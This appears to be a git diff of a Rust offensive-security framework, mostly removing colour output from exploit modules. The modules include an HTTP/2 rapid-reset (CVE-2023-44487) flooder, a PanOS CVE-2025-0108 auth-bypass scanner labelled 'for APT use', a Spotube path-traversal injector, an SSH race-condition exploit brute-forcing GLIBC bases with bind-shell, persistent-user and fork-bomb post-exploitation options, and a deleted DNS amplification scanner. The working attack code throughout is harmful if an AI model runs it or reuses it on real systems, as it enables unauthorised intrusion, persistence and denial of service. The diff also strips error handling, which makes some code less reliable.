println!(" Success Rate: {:.2}%", (successful as f64 / num_requests as f64) * 100.0);
println!(" Duration: {:.3}s", duration.as_secs_f64());
} else {
let (mut sender, connection) = Builder::new()
.handshake::<_, bytes::BytesMut>(stream)
.await?;
// Spawn connection task
tokio::spawn(async move {
if let Err(e) = connection.await {
eprintln!("Connection error: {:?}", e);
}
});
let mut successful = 0;
let start = Instant::now();
for i in 0..num_requests {
let request = http::Request::builder()
.uri(format!("http://{}:{}/", host, port))
.body(())
.unwrap();
match sender.send_request(request, true) {
Ok(_send_stream) => {
// Request sent successfully with end_of_stream=true
successful += 1;
}
Err(_) => {
break;
}
}
if i < num_requests - 1 {
tokio::time::sleep(Duration::from_millis(100)).await;
}
}
let duration = start.elapsed();
println!("{}", format!("[+] Baseline Results:").green());
println!(" Total Requests: {}", num_requests);
println!(" Successful: {}", successful);
println!(" Success Rate: {:.2}%", (successful as f64 / num_requests as f64) * 100.0);
println!(" Duration: {:.3}s", duration.as_secs_f64());
}
Ok(())
}
/// Perform rapid reset attack test
async fn rapid_reset_test(
host: &str,
port: u16,
use_ssl: bool,
num_streams: usize,
delay_ms: u64,
) -> Result<()> {
println!("{}", format!("\n[*] Starting rapid reset test with {} streams...", num_streams).yellow());
let host_normalized = normalize_host(host);
let addr = format!("{}:{}", host_normalized, port);
let socket_addr = addr
.to_socket_addrs()
.context("Invalid target address format")?
.next()
.context("Could not resolve target address")?;
let stream = TcpStream::connect(socket_addr).await?;
if use_ssl {
let root_store = tokio_rustls::rustls::RootCertStore::empty();
let config = tokio_rustls::rustls::ClientConfig::builder()
.with_safe_defaults()
.with_root_certificates(root_store)
.with_no_client_auth();
let connector = TlsConnector::from(std::sync::Arc::new(config));
let server_name = tokio_rustls::rustls::ServerName::try_from(host)
.map_err(|_| anyhow!("Invalid server name"))?;
let tls_stream = connector.connect(server_name, stream).await?;
let (mut sender, connection) = Builder::new()
.handshake::<_, bytes::BytesMut>(tls_stream)
.await?;
// Spawn connection task
let connection_task = tokio::spawn(async move {
if let Err(e) = connection.await {
eprintln!("Connection error: {:?}", e);
}
});
let mut created_streams = Vec::new();
let start = Instant::now();
// Phase 1: Rapidly create streams
println!("{}", "[*] Phase 1: Creating streams rapidly...".yellow());
for i in 0..num_streams {
let request = http::Request::builder()
.uri(format!("https://{}:{}/", host, port))
.header("user-agent", "CVE-2023-44487-Tester/1.0")
.body(())
.unwrap();
match sender.send_request(request, false) {
Ok((_response_future, send_stream)) => {
created_streams.push(send_stream);
if delay_ms > 0 {
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
}
}
Err(e) => {
println!("{}", format!("[-] Error creating stream {}: {:?}", i, e).red());
break;
}
}
}
let creation_duration = start.elapsed();
println!("{}", format!("[+] Created {} streams in {:.3}s", created_streams.len(), creation_duration.as_secs_f64()).green());
// Phase 2: Rapidly reset all streams
println!("{}", "[*] Phase 2: Resetting streams rapidly...".yellow());
let reset_start = Instant::now();
let mut reset_count = 0;
for mut send_stream in created_streams {
// Send RST_STREAM - send_stream has a send_reset method
send_stream.send_reset(h2::Reason::CANCEL);
reset_count += 1;
if delay_ms > 0 {
tokio::time::sleep(Duration::from_millis(delay_ms / 10)).await;
}
}
let reset_duration = reset_start.elapsed();
let total_duration = start.elapsed();
let reset_rate = if reset_duration.as_secs_f64() > 0.0 {
reset_count as f64 / reset_duration.as_secs_f64()
} else {
0.0
};
println!("{}", format!("[+] Reset {} streams in {:.3}s", reset_count, reset_duration.as_secs_f64()).green());
println!("{}", format!("[+] Reset Rate: {:.1} resets/second", reset_rate).green());
println!("{}", format!("[+] Total Duration: {:.3}s", total_duration.as_secs_f64()).green());
// Phase 3: Analysis
println!("{}", "\n[*] Vulnerability Analysis:".yellow());
if reset_rate > 1000.0 {
println!("{}", "[!] HIGH RISK: Server accepts very high reset rates".red().bold());
println!("{}", " This may indicate vulnerability to CVE-2023-44487".red());
} else if reset_rate > 100.0 {
println!("{}", "[!] MEDIUM RISK: Server accepts moderate reset rates".yellow().bold());
println!("{}", " Further testing may be needed".yellow());
} else {
println!("{}", "[+] LOWER RISK: Server has rate limiting on resets".green());
println!("{}", " This suggests some protection against the vulnerability".green());
}
// Cleanup
drop(sender);
let _ = timeout(Duration::from_secs(2), connection_task).await;
} else {
let (mut sender, connection) = Builder::new()
.handshake::<_, bytes::BytesMut>(stream)
.await?;
// Spawn connection task
let connection_task = tokio::spawn(async move {
if let Err(e) = connection.await {
eprintln!("Connection error: {:?}", e);
}
});
let mut created_streams = Vec::new();
let start = Instant::now();
// Phase 1: Rapidly create streams
println!("{}", "[*] Phase 1: Creating streams rapidly...".yellow());
for i in 0..num_streams {
let request = http::Request::builder()
.uri(format!("http://{}:{}/", host, port))
.header("user-agent", "CVE-2023-44487-Tester/1.0")
.body(())
.unwrap();
match sender.send_request(request, false) {
Ok((_response_future, send_stream)) => {
created_streams.push(send_stream);
if delay_ms > 0 {
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
}
}
Err(e) => {
println!("{}", format!("[-] Error creating stream {}: {:?}", i, e).red());
break;
}
}
}
let creation_duration = start.elapsed();
println!("{}", format!("[+] Created {} streams in {:.3}s", created_streams.len(), creation_duration.as_secs_f64()).green());
// Phase 2: Rapidly reset all streams
println!("{}", "[*] Phase 2: Resetting streams rapidly...".yellow());
let reset_start = Instant::now();
let mut reset_count = 0;
for mut send_stream in created_streams {
// Send RST_STREAM - send_stream has a send_reset method
send_stream.send_reset(h2::Reason::CANCEL);
reset_count += 1;
if delay_ms > 0 {
tokio::time::sleep(Duration::from_millis(delay_ms / 10)).await;
}
}
let reset_duration = reset_start.elapsed();
let total_duration = start.elapsed();
let reset_rate = if reset_duration.as_secs_f64() > 0.0 {
reset_count as f64 / reset_duration.as_secs_f64()
} else {
0.0
};
println!("{}", format!("[+] Reset {} streams in {:.3}s", reset_count, reset_duration.as_secs_f64()).green());
println!("{}", format!("[+] Reset Rate: {:.1} resets/second", reset_rate).green());
println!("{}", format!("[+] Total Duration: {:.3}s", total_duration.as_secs_f64()).green());
// Phase 3: Analysis
println!("{}", "\n[*] Vulnerability Analysis:".yellow());
if reset_rate > 1000.0 {
println!("{}", "[!] HIGH RISK: Server accepts very high reset rates".red().bold());
println!("{}", " This may indicate vulnerability to CVE-2023-44487".red());
} else if reset_rate > 100.0 {
println!("{}", "[!] MEDIUM RISK: Server accepts moderate reset rates".yellow().bold());
println!("{}", " Further testing may be needed".yellow());
} else {
println!("{}", "[+] LOWER RISK: Server has rate limiting on resets".green());
println!("{}", " This suggests some protection against the vulnerability".green());
}
// Cleanup
drop(sender);
let _ = timeout(Duration::from_secs(2), connection_task).await;
}
Ok(())
}
/// Main entry point for auto-dispatch system
pub async fn run(target: &str) -> Result<()> {
banner();
// Parse target (could be host:port or just host)
let (host, default_port) = if let Some(colon_pos) = target.rfind(':') {
let h = &target[..colon_pos];
let p = target[colon_pos + 1..].parse::<u16>().unwrap_or(443);
(h.to_string(), p)
} else {
(target.to_string(), 443)
};
// Interactive prompts
let mut port_input = String::new();
print!("{}", format!("Enter target port (default {}): ", default_port).cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut port_input)?;
let port: u16 = port_input.trim().parse().unwrap_or(default_port);
let mut ssl_input = String::new();
print!("{}", "Use SSL/TLS? (yes/no, default yes): ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut ssl_input)?;
let use_ssl = !ssl_input.trim().to_lowercase().starts_with('n');
let mut streams_input = String::new();
print!("{}", "Number of streams for rapid reset test (default 100): ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut streams_input)?;
let num_streams: usize = streams_input.trim().parse().unwrap_or(100);
let mut delay_input = String::new();
print!("{}", "Delay between operations in ms (default 1): ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut delay_input)?;
let delay_ms: u64 = delay_input.trim().parse().unwrap_or(1);
let mut baseline_input = String::new();
print!("{}", "Run baseline test first? (yes/no, default yes): ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut baseline_input)?;
let run_baseline = !baseline_input.trim().to_lowercase().starts_with('n');
println!("\n{}", "=".repeat(60).cyan());
println!("{}", format!("Target: {}:{}", host, port).yellow());
println!("{}", format!("SSL: {}", if use_ssl { "Enabled" } else { "Disabled" }).yellow());
println!("{}", "=".repeat(60).cyan());
// Legal disclaimer
println!("\n{}", "LEGAL DISCLAIMER:".red().bold());
println!("This tool is for authorized security testing only.");
println!("Ensure you have permission to test the target system.");
println!("Unauthorized use may be illegal.\n");
let mut confirm = String::new();
print!("{}", "Do you have permission to test this system? (yes/no): ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut confirm)?;
if !confirm.trim().to_lowercase().starts_with('y') {
println!("{}", "Exiting. Only use this tool on systems you're authorized to test.".red());
return Ok(());
}
// Run baseline test
if run_baseline {
if let Err(e) = baseline_test(&host, port, use_ssl, 10).await {
println!("{}", format!("[-] Baseline test error: {}", e).red());
}
}
// Run rapid reset test
if let Err(e) = rapid_reset_test(&host, port, use_ssl, num_streams, delay_ms).await {
println!("{}", format!("[-] Rapid reset test error: {}", e).red());
}
println!("\n{}", "[*] Test completed.".cyan());
Ok(())
}
-2
View File
@@ -1,2 +0,0 @@
pub mod cve_2023_44487_http2_rapid_reset;
+1 -3
View File
@@ -13,8 +13,6 @@ pub mod acti;
pub mod zte;
pub mod ivanti;
pub mod apache_tomcat;
pub mod palo_alto;
pub mod palto_alto;
pub mod roundcube;
pub mod flowise;
pub mod http2;
@@ -1,9 +1,6 @@
// Filename: cve_2025_0108.rs
// CVE-2025-0108 - PanOS Authentication Bypass
// Author: iSee857
// Ported to Rust by ethical hacker daniel for APT use
use anyhow::{Context, Result, bail};
use anyhow::{Result, bail};
use colored::*;
use reqwest::Client;
use std::{
@@ -14,7 +11,11 @@ use std::{
};
use url::Url;
/// Displays module banner
/// // CVE-2025-0108 - PanOS Authentication Bypass
/// // Author: iSee857
/// // Ported to Rust by ethical hacker daniel for APT use
/// // Displays module banner
fn banner() {
println!(
"{}",
@@ -29,27 +30,14 @@ fn banner() {
);
}
/// Reads target list from file
/// // Reads target list from file
fn read_file(file_path: &str) -> Result<Vec<String>> {
let file = File::open(file_path)
.with_context(|| format!("Failed to open file: {}", file_path))?;
let file = File::open(file_path)?;
let reader = BufReader::new(file);
let urls: Vec<String> = reader
.lines()
.filter_map(|line| {
let line = line.ok()?;
let trimmed = line.trim();
if trimmed.is_empty() || trimmed.starts_with('#') {
None
} else {
Some(trimmed.to_string())
}
})
.collect();
Ok(urls)
Ok(reader.lines().filter_map(Result::ok).collect())
}
/// Normalize IPv6 host with double or triple brackets
/// // Normalize IPv6 host with double or triple brackets
fn normalize_ipv6_host(host: &str) -> String {
let stripped = host.trim_matches(|c| c == '[' || c == ']');
if stripped.contains(':') {
@@ -59,14 +47,14 @@ fn normalize_ipv6_host(host: &str) -> String {
}
}
/// Constructs the full normalized URL
/// // Constructs the full normalized URL
fn normalize_url(host: &str, port: u16, proto: &str) -> Option<String> {
let host = normalize_ipv6_host(host);
let base = format!("{}{}:{}", proto, host, port);
Url::parse(&base).ok().map(|u| u.to_string())
}
/// Opens a URL in the default system browser
/// // Opens a URL in the default system browser
fn open_browser(url: &str) -> Result<()> {
#[cfg(target_os = "linux")]
let cmd = Command::new("xdg-open").arg(url).spawn();
@@ -83,7 +71,7 @@ fn open_browser(url: &str) -> Result<()> {
Ok(())
}
/// Executes CVE-2025-0108 check
/// // Executes CVE-2025-0108 check
async fn check(url: &str, port: u16, client: &Client) -> Result<bool> {
let protocols = ["http://", "https://"];
let path = "/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css";
@@ -91,7 +79,7 @@ async fn check(url: &str, port: u16, client: &Client) -> Result<bool> {
for proto in &protocols {
if let Some(base_url) = normalize_url(url, port, proto) {
let full_url = format!("{}{}", base_url.trim_end_matches('/'), path);
println!("{}", format!("[*] Testing: {}", full_url).yellow());
println!("{}", full_url);
let resp = client.get(&full_url).send().await;
@@ -102,25 +90,11 @@ async fn check(url: &str, port: u16, client: &Client) -> Result<bool> {
if status.as_u16() == 200 && body.contains("Zero Touch Provisioning") {
println!(
"{}",
format!("[+] Find: {}:{} PanOS_CVE-2025-0108_LoginByPass!", url, port)
.green()
.bold()
format!("Find: {}:{} PanOS_CVE-2025-0108_LoginByPass!", url, port).red()
);
println!("{}", format!("[*] Vulnerable URL: {}", full_url).cyan());
let _ = open_browser(&full_url);
return Ok(true);
} else {
println!(
"{}",
format!("[-] Not vulnerable: {}:{} - Response code: {}", url, port, status.as_u16())
.red()
);
}
} else {
println!(
"{}",
format!("[-] Error connecting to {}:{}", url, port).red()
);
}
}
}
@@ -128,12 +102,13 @@ async fn check(url: &str, port: u16, client: &Client) -> Result<bool> {
Ok(false)
}
/// Main entry point for auto-dispatch system
/// // Main entry point for auto-dispatch system
pub async fn run(target: &str) -> Result<()> {
banner();
let mut port_input = String::new();
print!("{}", "Enter target port (default 443): ".cyan().bold());
print!("Enter target port (default 443): ");
io::stdout().flush()?;
io::stdin().read_line(&mut port_input)?;
let port: u16 = port_input.trim().parse().unwrap_or(443);
@@ -141,24 +116,15 @@ pub async fn run(target: &str) -> Result<()> {
let client = Client::builder()
.timeout(Duration::from_secs(10))
.danger_accept_invalid_certs(true)
.build()
.context("Failed to create HTTP client")?;
.build()?;
if target.ends_with(".txt") {
let urls = read_file(target)?;
if urls.is_empty() {
return Err(anyhow::anyhow!("No URLs found in file: {}", target));
}
println!("{}", format!("[*] Loaded {} URLs from file", urls.len()).yellow());
let mut vulnerable_count = 0;
for url in urls {
if check(&url, port, &client).await? {
vulnerable_count += 1;
}
let _ = check(&url, port, &client).await;
}
println!("{}", format!("[*] Scan completed. Found {} vulnerable target(s)", vulnerable_count).cyan());
} else {
let _ = check(target, port, &client).await?;
let _ = check(target, port, &client).await;
}
Ok(())
+1 -2
View File
@@ -1,5 +1,4 @@
use anyhow::Result;
use colored::*;
use rand::{seq::SliceRandom, rng};
use std::{
fs,
@@ -10,7 +9,7 @@ use std::{
use base64::{engine::general_purpose::STANDARD as BASE64_STANDARD, Engine as _};
fn prompt(prompt: &str) -> Result<String> {
print!("{}", prompt.cyan().bold());
print!("{prompt}");
io::stdout().flush()?;
let mut buffer = String::new();
io::stdin().read_line(&mut buffer)?;
@@ -4,7 +4,6 @@
use rand::prelude::*;
use anyhow::Result;
use colored::*;
use rand::{rng, seq::SliceRandom, Rng};
use std::io::{self, Write as IoWrite};
use tokio::fs::File as TokioFile;
@@ -286,8 +285,7 @@ call :SleepS {random_sleep_lo}
/// // Prompt user, fallback to default if empty input
fn prompt(msg: &str, default: Option<&str>) -> String {
let default_str = default.map_or("".to_string(), |d| format!(" [{}]", d));
print!("{}", format!("{}{}: ", msg, default_str).cyan().bold());
print!("{}{}: ", msg, default.map_or("".to_string(), |d| format!(" [{}]", d)));
io::stdout().flush().unwrap();
let mut input = String::new();
io::stdin().read_line(&mut input).unwrap();
+4 -5
View File
@@ -4,7 +4,6 @@
//// no auth when you use api and can be excuted locally
//// src/modules/exploits/spotube/spotube.rs
use anyhow::{Context, Result};
use colored::*;
use futures_util::{SinkExt, StreamExt};
use reqwest::Client;
use serde_json::json;
@@ -72,7 +71,7 @@ async fn execute(host: &str, port: &str, path: &str) -> Result<()> {
// //// // Sends a malicious 'load' event over WS with a track name containing ../
async fn ws_inject_path_traversal(host: &str, port: &str) -> Result<()> {
// prompt for malicious filename
print!("{}", "Enter malicious filename (e.g. ../evil.sh): ".cyan().bold());
print!("Enter malicious filename (e.g. ../evil.sh): ");
io::stdout().flush()?;
let mut name = String::new();
io::stdin().read_line(&mut name)?;
@@ -82,7 +81,7 @@ async fn ws_inject_path_traversal(host: &str, port: &str) -> Result<()> {
};
// prompt for fake track ID
print!("{}", "Enter fake track ID (e.g. INJECT1): ".cyan().bold());
print!("Enter fake track ID (e.g. INJECT1): ");
io::stdout().flush()?;
let mut tid = String::new();
io::stdin().read_line(&mut tid)?;
@@ -92,7 +91,7 @@ async fn ws_inject_path_traversal(host: &str, port: &str) -> Result<()> {
};
// prompt for codec extension
print!("{}", "Enter codec extension (e.g. mp3): ".cyan().bold());
print!("Enter codec extension (e.g. mp3): ");
io::stdout().flush()?;
let mut cd = String::new();
io::stdin().read_line(&mut cd)?;
@@ -155,7 +154,7 @@ pub async fn run(target: &str) -> Result<()> {
let host = target.to_string(); // use target passed from set command
// //// // port prompt (optional override)
print!("{}", "Enter port [17086]: ".cyan().bold());
print!("Enter port [17086]: ");
io::stdout().flush()?;
let mut p = String::new();
io::stdin().read_line(&mut p)?;
@@ -1,10 +1,9 @@
use std::io::{self, ErrorKind, Write};
use std::sync::Arc;
use anyhow::{Result, bail, Context};
use colored::*;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use tokio::net::TcpStream;
use tokio::time::{sleep, timeout, Duration, Instant};
use tokio::time::{sleep, Duration, Instant};
use tokio::sync::Semaphore;
use futures_util::stream::{FuturesUnordered, StreamExt};
@@ -77,7 +76,7 @@ fn normalize_target(ip: &str, port: u16) -> Result<String> {
}
async fn handle_bind_shell_session(conn: TcpStream) -> anyhow::Result<()> {
println!("{}", "[*] Connected! Interactive shell below (type 'exit' to quit):".green().bold());
println!("[*] Connected! Interactive shell below (type 'exit' to quit):");
let (mut rd, mut wr) = tokio::io::split(conn);
let mut stdin = tokio::io::stdin();
let mut stdout = tokio::io::stdout();
@@ -111,7 +110,7 @@ async fn handle_bind_shell_session(conn: TcpStream) -> anyhow::Result<()> {
});
let _ = tokio::try_join!(reader, writer);
println!("{}", "[*] Shell session ended.".yellow());
println!("[*] Shell session ended.");
Ok(())
}
@@ -130,10 +129,9 @@ async fn recv_retry(stream: &mut TcpStream, buf: &mut [u8]) -> Result<usize> {
loop {
match stream.read(buf).await {
Ok(n) if n > 0 => return Ok(n),
Ok(0) => bail!("Connection closed while receiving data"),
Ok(_) => bail!("Unexpected read result"),
Err(ref e) if e.kind() == ErrorKind::WouldBlock || e.kind() == ErrorKind::TimedOut => {
sleep(Duration::from_millis(10)).await;
Ok(_) => bail!("Connection closed while receiving data"),
Err(ref e) if e.kind() == ErrorKind::WouldBlock => {
sleep(Duration::from_millis(1)).await;
continue;
}
Err(e) => return Err(e.into()),
@@ -213,28 +211,27 @@ async fn attempt_race_condition(mut stream: TcpStream, parsing_time: f64, glibc_
let calculated_wait_time = LOGIN_GRACE_TIME - parsing_time - 0.001;
if calculated_wait_time < 0.0 {
println!("{}", format!("[!] Warning: Calculated wait time is negative ({:.4}s). Clamping to 0.", calculated_wait_time).yellow());
println!("[!] Warning: Calculated wait time is negative ({:.4}s). Clamping to 0.", calculated_wait_time);
}
let wait_time_duration = Duration::from_secs_f64(calculated_wait_time.max(0.0));
sleep(wait_time_duration).await;
stream.write_all(&public_key_packet_data[public_key_packet_data.len() - 1..]).await?;
let mut buf = [0u8; 1024];
match timeout(Duration::from_secs(2), stream.read(&mut buf)).await {
Ok(Ok(n)) if n > 0 && !buf[..n.min(8)].starts_with(b"SSH-2.0-") => Ok(true),
Ok(Ok(0)) => Ok(true),
Ok(Ok(_)) => Ok(false),
Ok(Err(_)) => Ok(true),
Err(_) => Ok(true), // Timeout might indicate success
match stream.read(&mut buf).await {
Ok(n) if n > 0 && !buf.starts_with(b"SSH-2.0-") => Ok(true),
Ok(0) => Ok(true),
Err(_) => Ok(true),
_ => Ok(false),
}
}
fn print_post_actions() {
println!("{}", "Available Post-Ex Actions:".cyan().bold());
println!(" 1. {} (port {})", "Bind Shell".green(), BIND_SHELL_PORT);
println!(" 2. {} user '{}'", "Persistent".green(), PERSISTENT_USER);
println!(" 3. {} (Denial/Crash)", "Fork bomb".red());
println!(" 4. {} (recommended)", "Interactive PTY shell".green().bold());
println!("Available Post-Ex Actions:");
println!(" 1. Bind Shell (port {})", BIND_SHELL_PORT);
println!(" 2. Persistent user '{}'", PERSISTENT_USER);
println!(" 3. Fork bomb (Denial/Crash)");
println!(" 4. Interactive PTY shell (recommended)");
}
fn get_postex_command(action: u8) -> String {
@@ -254,10 +251,10 @@ fn get_postex_command(action: u8) -> String {
}
async fn execute_exploit_logic(target_ip: String, port_num: u16) -> Result<()> {
println!("{}", format!("[*] Target: {}:{}", target_ip, port_num).cyan().bold());
println!("[*] Target: {}:{}", target_ip, port_num);
print_post_actions();
print!("{}", "Select post-ex action [1-4, default 4]: ".cyan().bold());
print!("Select post-ex action [1-4, default 4]: ");
std::io::stdout().flush().ok();
let mut choice_str = String::new();
std::io::stdin().read_line(&mut choice_str).ok();
@@ -265,7 +262,7 @@ async fn execute_exploit_logic(target_ip: String, port_num: u16) -> Result<()> {
let num_attempts_per_base: usize;
loop {
print!("{}", "Enter the number of attempts per GLIBC base: ".cyan().bold());
print!("Enter the number of attempts per GLIBC base: ");
std::io::stdout().flush().context("Failed to flush stdout for attempts input")?;
let mut attempts_str = String::new();
std::io::stdin().read_line(&mut attempts_str).context("Failed to read number of attempts")?;
@@ -275,7 +272,7 @@ async fn execute_exploit_logic(target_ip: String, port_num: u16) -> Result<()> {
break;
}
_ => {
println!("{}", "[!] Invalid input. Please enter a positive integer for the number of attempts.".yellow());
println!("[!] Invalid input. Please enter a positive integer for the number of attempts.");
}
}
}
@@ -291,9 +288,9 @@ async fn execute_exploit_logic(target_ip: String, port_num: u16) -> Result<()> {
current_base += GLIBC_STEP;
}
println!("{}", format!("[*] Brute-forcing GLIBC base from 0x{:x} to 0x{:x} with step 0x{:x}", GLIBC_BASE_START, GLIBC_BASE_END, GLIBC_STEP).cyan());
println!("{}", format!("[*] Total GLIBC bases to check: {}", glibc_bases.len()).cyan());
println!("{}", format!("[*] Attempts per GLIBC base: {}", num_attempts_per_base).cyan());
println!("[*] Brute-forcing GLIBC base from 0x{:x} to 0x{:x} with step 0x{:x}", GLIBC_BASE_START, GLIBC_BASE_END, GLIBC_STEP);
println!("[*] Total GLIBC bases to check: {}", glibc_bases.len());
println!("[*] Attempts per GLIBC base: {}", num_attempts_per_base);
for glibc_base_addr in glibc_bases {
@@ -327,7 +324,7 @@ async fn execute_exploit_logic(target_ip: String, port_num: u16) -> Result<()> {
};
if attempt_race_condition(stream, parsing_time, glibc_base_addr).await.unwrap_or(false) {
println!("{}", format!("[+] Exploit succeeded! GLIBC base 0x{:x} (attempt {})", glibc_base_addr, attempt_num).green().bold());
println!("[+] Exploit succeeded! GLIBC base 0x{:x} (attempt {})", glibc_base_addr, attempt_num);
if !cmd_clone.is_empty() {
println!("[*] Post-ex command to execute (conceptually): {}", cmd_clone);
@@ -378,10 +375,10 @@ async fn execute_exploit_logic(target_ip: String, port_num: u16) -> Result<()> {
while let Some(task_result) = tasks.next().await {
match task_result {
Ok(Ok(true)) => {
println!("{}", "[SUCCESS] Exploit Succeeded! One of the attempts was successful.".green().bold());
println!("{}", "[*] Check chosen post-exploitation action effects.".cyan());
println!("[SUCCESS] Exploit Succeeded! One of the attempts was successful.");
println!("[*] Check chosen post-exploitation action effects.");
if mode_choice == 1 {
println!("{}", format!("[*] If you chose a bind shell, connect with: nc {} {}", target_ip, BIND_SHELL_PORT).cyan());
println!("[*] If you chose a bind shell, connect with: nc {} {}", target_ip, BIND_SHELL_PORT);
}
success_found = true;
break;
@@ -393,8 +390,8 @@ async fn execute_exploit_logic(target_ip: String, port_num: u16) -> Result<()> {
}
if !success_found {
println!("{}", "[-] All attempts finished. Exploit likely unsuccessful with current parameters.".red());
println!("{}", "[-] Try adjusting GLIBC range, timing, or concurrency if target is vulnerable.".yellow());
println!("[-] All attempts finished. Exploit likely unsuccessful with current parameters.");
println!("[-] Try adjusting GLIBC range, timing, or concurrency if target is vulnerable.");
}
Ok(())
}
@@ -411,7 +408,7 @@ pub async fn run(target_info: &str) -> anyhow::Result<()> {
let port_num: u16;
loop {
print!("{}", "Enter the target port number (e.g., 22): ".cyan().bold());
print!("Enter the target port number (e.g., 22): ");
io::stdout().flush().context("Failed to flush stdout")?;
let mut port_input = String::new();
@@ -423,10 +420,10 @@ pub async fn run(target_info: &str) -> anyhow::Result<()> {
break;
}
Ok(_) => {
println!("{}", "[!] Invalid port number. Port must be a positive integer (1-65535). Please try again.".yellow());
println!("[!] Invalid port number. Port must be a positive integer (1-65535). Please try again.");
}
Err(_) => {
println!("{}", "[!] Invalid input. Please enter a valid port number (1-65535).".yellow());
println!("[!] Invalid input. Please enter a valid port number (1-65535).");
}
}
}
+4
View File
@@ -1 +1,5 @@
pub mod uniview_nvr_pwd_disclosure;
// pub mod
@@ -1,7 +1,7 @@
use aes::Aes128;
use anyhow::Result;
use cipher::{BlockDecrypt, KeyInit, Block};
use colored::*;
use cipher::{BlockDecrypt, KeyInit};
use cipher::generic_array::GenericArray;
use reqwest::{Client, cookie::Jar};
use std::{
fs::{self, File},
@@ -16,6 +16,8 @@ use std::net::ToSocketAddrs;
/// AES-128 ECB decrypt without padding
fn decrypt_ecb_nopad(data: &[u8], key: &[u8]) -> Result<Vec<u8>> {
use cipher::consts::U16;
if data.len() % 16 != 0 {
anyhow::bail!("ECB decryption requires block-aligned data");
}
@@ -24,9 +26,7 @@ fn decrypt_ecb_nopad(data: &[u8], key: &[u8]) -> Result<Vec<u8>> {
let mut output = Vec::with_capacity(data.len());
for chunk in data.chunks(16) {
let mut arr = [0u8; 16];
arr.copy_from_slice(chunk);
let mut block = Block::<Aes128>::from(arr);
let mut block = GenericArray::<u8, U16>::clone_from_slice(chunk);
cipher.decrypt_block(&mut block);
output.extend_from_slice(&block);
}
@@ -47,8 +47,7 @@ fn parse_target(target: &str) -> Result<(String, u16)> {
return Ok((parts[0].to_string(), port));
}
print!("{}", "[?] No port provided. Enter port: ".cyan().bold());
std::io::stdout().flush()?;
println!("[?] No port provided. Enter port:");
let mut input = String::new();
std::io::stdin().read_line(&mut input)?;
let port = input.trim().parse::<u16>()?;
-638
View File
@@ -1,638 +0,0 @@
use anyhow::{anyhow, Context, Result};
use colored::*;
use rand::Rng;
use std::collections::HashSet;
use std::fs::File;
use std::io::{self, BufRead, BufReader, Write};
use std::net::{IpAddr, SocketAddr, ToSocketAddrs};
use std::path::Path;
use std::time::Duration;
use trust_dns_client::client::{AsyncClient, ClientHandle};
use trust_dns_client::proto::op::ResponseCode;
use trust_dns_client::rr::{DNSClass, Name, RecordType};
use trust_dns_client::udp::UdpClientStream;
use trust_dns_proto::op::Message;
use trust_dns_proto::xfer::DnsResponse;
use tokio::net::UdpSocket;
#[derive(Clone, Debug)]
struct TargetSpec {
input: String,
host: String,
port: Option<u16>,
}
/// Scan DNS resolvers for open recursion with improved input validation.
pub async fn run(initial_target: &str) -> Result<()> {
println!("\n=== DNS Recursion & Amplification Scanner ===");
let mut targets = collect_targets(initial_target)?;
if targets.is_empty() {
return Err(anyhow!(
"No valid targets provided. Supply at least one IP/hostname."
));
}
let needs_default_port = targets.iter().any(|t| t.port.is_none());
let default_port = if needs_default_port {
prompt_port("Default DNS port for targets without port", 53)?
} else {
53
};
let default_domain = random_test_domain();
let query_name_input = prompt_default("Domain to query", &default_domain)?;
let query_name = validate_domain_input(&query_name_input)?;
let record_input =
prompt_default("Record type (A, AAAA, ANY, DNSKEY, TXT, MX)", "ANY")?;
let record_type = parse_record_type(&record_input)?;
println!(
"[*] Prepared {} query for {} across {} target(s)",
record_type,
query_name,
targets.len()
);
let name = Name::from_str_relaxed(&query_name)
.with_context(|| format!("Invalid domain name '{}'", query_name))?;
let mut any_success = false;
let mut last_error: Option<anyhow::Error> = None;
for spec in targets.drain(..) {
let port = spec.port.unwrap_or(default_port);
let display = format_endpoint(&spec.host, port);
println!(
"\n[*] Processing target {} (input: {})",
display.cyan(),
spec.input
);
match resolve_target(&spec.host, port).await {
Ok((socket_addr, resolved_display)) => {
println!("[*] Target resolver: {}", resolved_display);
match query_target(socket_addr, &resolved_display, &name, record_type).await {
Ok(()) => any_success = true,
Err(err) => {
eprintln!(
"{}",
format!("[!] Query failed for {}: {}", resolved_display, err).red()
);
last_error = Some(err);
}
}
}
Err(err) => {
eprintln!(
"{}",
format!("[!] Failed to resolve {}: {}", spec.input, err).red()
);
last_error = Some(err);
}
}
}
if any_success {
Ok(())
} else {
Err(last_error.unwrap_or_else(|| anyhow!("All targets failed.")))
}
}
async fn query_target(
socket_addr: SocketAddr,
display_target: &str,
name: &Name,
record_type: RecordType,
) -> Result<()> {
println!(
"[*] Sending {} query (timeout 5s) to {}",
record_type, display_target
);
let timeout = Duration::from_secs(5);
let stream = UdpClientStream::<UdpSocket>::with_timeout(socket_addr, timeout);
let (mut client, bg) =
AsyncClient::connect(stream).await.context("Failed to initiate DNS client")?;
tokio::spawn(bg);
let response: DnsResponse = client
.query(name.clone(), DNSClass::IN, record_type)
.await
.with_context(|| format!("DNS query to {} failed", display_target))?;
let (message, _) = response.into_parts();
report_result(&message, name, record_type);
Ok(())
}
fn report_result(message: &Message, name: &Name, record_type: RecordType) {
let recursion_available = message.recursion_available();
let recursion_desired = message.recursion_desired();
let authoritative = message.authoritative();
let truncated = message.truncated();
let rcode = message.response_code();
println!();
println!(
"{}",
format!(
"[*] Response code: {:?} | Answers: {} | Authority: {} | Additional: {}",
rcode,
message.answers().len(),
message.name_servers().len(),
message.additionals().len()
)
);
if truncated {
println!("[!] Response was truncated (TC flag set).");
}
println!(
"[*] Flags: RD={} RA={} AA={}",
recursion_desired, recursion_available, authoritative
);
if recursion_available && rcode != ResponseCode::Refused {
println!(
"{}",
format!(
"[+] {} appears to allow recursion (RA flag set) for {} {} queries.",
name,
record_type,
if authoritative { "(authoritative data returned)" } else { "" }
)
.green()
);
println!(
"{}",
" This resolver may be abused for reflection/amplification attacks (ANY/DNSSEC)."
.yellow()
);
